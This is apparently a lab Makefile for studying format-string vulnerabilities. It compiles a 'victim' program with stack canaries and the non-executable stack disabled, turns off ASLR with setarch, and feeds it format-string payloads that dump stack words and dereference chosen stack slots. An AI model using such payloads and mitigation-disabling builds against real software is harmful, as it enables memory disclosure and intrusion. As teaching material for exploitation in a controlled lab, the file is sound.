# This is an attempt to automate the construction of an attack against
# the victim program that uses user input as a format string.
#

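# Command-style targets have no file of their own; declare them phony so a
# stray file named e.g. `clean` or `inspect` cannot mask them and so `all`
# never looks "up to date".
.PHONY: all inspect findformat clean
all: victim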

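# The lab binary.  The mitigation-disabling flags are kept apart from
# CFLAGS so that `make CFLAGS=-O2` cannot silently drop them, and so it is
# obvious they are a deliberate choice for this exercise only:
#   -fno-stack-protector  no stack canaries
#   -z execstack          executable stack (no NX/DEP)
# Together with `setarch -R` in the inspect/findformat targets (ASLR off)
# these remove exactly the protections a hardened build would have.
# $(CC) is honoured when the user sets it; otherwise keep the file's gcc
# (GNU make's built-in default for CC is `cc`, hence the origin check).
ifeq ($(origin CC),default)
CC := gcc
endif
LAB_CFLAGS := -Wall -fno-stack-protector -z execstack

victim: victim.c
	$(CC) $(LAB_CFLAGS) $(CFLAGS) -o $@ $<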

# Exploratory target: run the lab binary with ASLR disabled (setarch -R for
# the current architecture) and pass format strings as its argument.  The
# victim program uses that argument as a format string (see the header
# comment), so the first run dumps 20 stack words as 0x-prefixed hex and
# the following runs use the positional `%N$s` form to dereference one
# chosen stack slot as a string.
# `$$` is doubled throughout so the shell (not make) sees a single `$`,
# both in `$$(arch)` and in the positional conversions.
# NOTE(review): the Python one-liners use the Python 2 `print` statement;
# `python` must resolve to a Python 2 interpreter for them to work.
inspect: victim
	@# exploring the stack until we find the pointer to the string...
	setarch $$(arch) -R ./victim "$$(python -c "print '%#018lx  '*20")"
	@# using the $ formating symbol to pick the 'right' argument on the stack
	setarch $$(arch) -R ./victim '%11$$s'
	setarch $$(arch) -R ./victim '%7$$s'
# The next line is a disabled variant of the two runs above (shell comment).
	@# setarch $$(arch) -R ./victim '%13$$s'

# Locate the argument string itself in the stack dump: the buffer is padded
# with 14 Bs so the eight As land on a word boundary (0x41 repeated shows
# up in the %#018lx output), and 144 conversions dump enough of the stack
# to find it.  The repetition counts are tuned by hand (see the shell
# comment below).  The second run replaces the As with '\x43' ('C') bytes;
# the author's note records that placing an address in the argument this
# way fails because argv strings are NUL-terminated.
# NOTE(review): Python 2 `print` syntax, as in the inspect target.
findformat: victim
	@# try to find the actual format string characters on the stack
	@# adjust the repetition factors for the Bs to align the As 
	setarch $$(arch) -R ./victim "$$(python -c "print 'B'*14 + 'A'*8 + 'B'*5 + '\n' + '%#018lx  '*144")"
	@# lets try to write an address where the As are...
	@# ... does not work since argv strings cant contain nul bytes
	setarch $$(arch) -R ./victim "$$(python -c "print 'B'*14 + '\x43\x43\x43\x43\x43\x43\x43\x43' + 'B'*5 + '\n' + '%#018lx  '*144")"

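# Remove only what this Makefile builds: the compiled lab binary.
# $(RM) is make's built-in `rm -f`, so a missing file is not an error.
.PHONY: clean
clean:
	$(RM) victim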
